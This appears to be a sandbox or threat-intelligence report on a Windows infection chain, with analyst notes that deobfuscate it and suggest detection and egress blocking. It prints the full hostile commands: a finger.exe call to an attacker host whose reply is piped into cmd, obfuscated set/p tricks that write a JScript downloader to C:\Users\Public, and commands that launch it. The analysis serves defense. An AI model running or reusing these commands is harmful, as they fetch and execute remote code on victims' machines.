Technical Information
- '<SYSTEM32>\finger.exe' ok@ta365shoo4m.pilhamenth.email
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\XCm.js"
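- C:\users\public\xcm.js
  (Note: this is the file written by the `sEt/p ... 1>C:\Users\Public\XCm%THTA%s` redirect listed below, where THTA is set to `.j`; it is then run by wscript.exe.)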
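- 'ta#######4m.pilhamenth.email':79
- '96######esu.locaster.live':80
- 'ta#######4m.pilhamenth.email':79
  (Note: port 79 is the Finger service port and matches the finger.exe invocation; port 80 matches the 'hTtP:' moniker that the dropped script builds. Outbound port 79 from a workstation is unusual and is worth alerting on or blocking at egress.)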
- DNS ASK ta#######4m.pilhamenth.email
- DNS ASK 96######esu.locaster.live
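- '<SYSTEM32>\cmd.exe' /c finger.exe ok@ta365shoo4m.pilhamenth.email |more +2 |cmd
  (Note: the text returned by the remote Finger server is passed through `more +2`, which skips its first two lines, and the remainder is piped into `cmd` as commands. For detection, look for finger.exe contacting an external host and for cmd.exe receiving its input from a pipe fed by finger.exe or more.com.)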
- '<SYSTEM32>\cmd.exe'
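- '<SYSTEM32>\cmd.exe' /V/D/c "Set THTA=.j&&sET PKMAQ=vPh2parPh2p a =Ph2p 'scPh2priPh2pptPh2p:'; b =Ph2p 'hPh2pTtPPh2p:'; GPh2petPh2pObjPh2pecPh2pt(Ph2pa+b+'&&sET 40JI=OTMLKOTMLK961dkrcaesu.locaster.liveOTMLK?1OTMLK'...
  (Note: the command line is truncated in the report. `Ph2p` and `OTMLK` are filler tokens inserted to break up keywords. With `Ph2p` removed and `OTMLK` replaced by `/`, the variables form JScript that calls GetObject on a 'script:' + 'hTtP:' moniker pointing at the locaster.live host. Mixed-case `sET` and split variable names are further obfuscation against string matching.)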
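- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 3WCAW="%PKMAQ:Ph2p=%%40JI:OTMLK=/%" 0<nul 1>C:\Users\Public\XCm%THTA%s"
  (Note: `%PKMAQ:Ph2p=%` expands PKMAQ with every `Ph2p` removed, and `%40JI:OTMLK=/%` expands 40JI with `OTMLK` replaced by `/`. `set /p` with input from `nul` prints that text as its prompt, and the `1>` redirect writes it to C:\Users\Public\XCm.js, since THTA is `.j`. The decoded script therefore appears on disk but not in this command line, so command-line logging should be paired with file-creation monitoring of C:\Users\Public.)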
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\XCm%THTA%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\XCm.js